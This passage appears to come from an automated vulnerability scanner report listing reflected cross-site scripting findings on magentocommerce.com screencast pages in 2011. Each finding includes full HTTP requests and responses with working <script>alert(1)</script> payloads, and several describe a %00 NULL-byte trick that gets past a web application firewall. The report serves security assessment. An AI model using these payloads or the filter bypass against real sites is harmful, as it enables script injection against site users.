1.18. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00def0b"><script>alert(1)</script>c6549ed30de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as def0b"><script>alert(1)</script>c6549ed30de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/designers-guide-1/view?%00def0b"><script>alert(1)</script>c6549ed30de=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176140; expires=Sat, 11-Aug-2012 15:09:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:00 GMT
Content-Length: 37527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/designers-guide-1/view?%00def0b"><script>alert(1)</script>c6549ed30de=1">
...[SNIP]...

1.19. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c40"><script>alert(1)</script>c1bbef6f38a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/gift-certificates-cards60c40"><script>alert(1)</script>c1bbef6f38a/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176170; expires=Sat, 11-Aug-2012 15:09:30 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:31 GMT
Content-Length: 33506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/gift-certificates-cards60c40"><script>alert(1)</script>c1bbef6f38a/view">
...[SNIP]...

1.20. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0030566"><script>alert(1)</script>1b56dd24d01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30566"><script>alert(1)</script>1b56dd24d01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/gift-certificates-cards/view?%0030566"><script>alert(1)</script>1b56dd24d01=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176072; expires=Sat, 11-Aug-2012 15:07:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:52 GMT
Content-Length: 33368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view?%0030566"><script>alert(1)</script>1b56dd24d01=1">
...[SNIP]...

1.21. http://www.magentocommerce.com/media/screencasts/grouped-products/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee831"><script>alert(1)</script>08d6ab08592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/grouped-productsee831"><script>alert(1)</script>08d6ab08592/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 33499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/grouped-productsee831"><script>alert(1)</script>08d6ab08592/view">
...[SNIP]...

1.22. http://www.magentocommerce.com/media/screencasts/grouped-products/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d1e3"><script>alert(1)</script>aba8c91f3b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d1e3"><script>alert(1)</script>aba8c91f3b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/grouped-products/view?%006d1e3"><script>alert(1)</script>aba8c91f3b4=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176258; expires=Sat, 11-Aug-2012 15:10:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:58 GMT
Content-Length: 33173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/grouped-products/view?%006d1e3"><script>alert(1)</script>aba8c91f3b4=1">
...[SNIP]...

1.23. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7ecf"><script>alert(1)</script>ff43114dd65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/introducing-the-magento-enterprise-editionc7ecf"><script>alert(1)</script>ff43114dd65/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-editionc7ecf"><script>alert(1)</script>ff43114dd65/view">
...[SNIP]...

1.24. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010cbe"><script>alert(1)</script>0bc041d5609 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10cbe"><script>alert(1)</script>0bc041d5609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view?%0010cbe"><script>alert(1)</script>0bc041d5609=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176067; expires=Sat, 11-Aug-2012 15:07:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:48 GMT
Content-Length: 33370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view?%0010cbe"><script>alert(1)</script>0bc041d5609=1">
...[SNIP]...

1.25. http://www.magentocommerce.com/media/screencasts/landing-pages/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f38"><script>alert(1)</script>f7a0f786ba8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/landing-pages26f38"><script>alert(1)</script>f7a0f786ba8/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176307; expires=Sat, 11-Aug-2012 15:11:47 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:48 GMT
Content-Length: 33496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/landing-pages26f38"><script>alert(1)</script>f7a0f786ba8/view">
...[SNIP]...

1.26. http://www.magentocommerce.com/media/screencasts/landing-pages/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b1897"><script>alert(1)</script>5cb5f08d5e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1897"><script>alert(1)</script>5cb5f08d5e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/landing-pages/view?%00b1897"><script>alert(1)</script>5cb5f08d5e7=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176204; expires=Sat, 11-Aug-2012 15:10:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:04 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/landing-pages/view?%00b1897"><script>alert(1)</script>5cb5f08d5e7=1">
...[SNIP]...

1.27. http://www.magentocommerce.com/media/screencasts/permissions/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1385"><script>alert(1)</script>c0704bd17d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/permissionsc1385"><script>alert(1)</script>c0704bd17d3/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176230; expires=Sat, 11-Aug-2012 15:10:30 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:30 GMT
Content-Length: 33494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/permissionsc1385"><script>alert(1)</script>c0704bd17d3/view">
...[SNIP]...

1.28. http://www.magentocommerce.com/media/screencasts/permissions/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0075a4d"><script>alert(1)</script>e0c36da2c0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a4d"><script>alert(1)</script>e0c36da2c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/permissions/view?%0075a4d"><script>alert(1)</script>e0c36da2c0b=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176152; expires=Sat, 11-Aug-2012 15:09:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:12 GMT
Content-Length: 35313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/permissions/view?%0075a4d"><script>alert(1)</script>e0c36da2c0b=1">
...[SNIP]...

1.29. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2a4"><script>alert(1)</script>c0886635f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissionsfd2a4"><script>alert(1)</script>c0886635f2/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176150; expires=Sat, 11-Aug-2012 15:09:10 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:10 GMT
Content-Length: 33556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissionsfd2a4"><script>alert(1)</script>c0886635f2/view">
...[SNIP]...

1.30. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0091413"><script>alert(1)</script>c91b0ff721a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91413"><script>alert(1)</script>c91b0ff721a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view?%0091413"><script>alert(1)</script>c91b0ff721a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
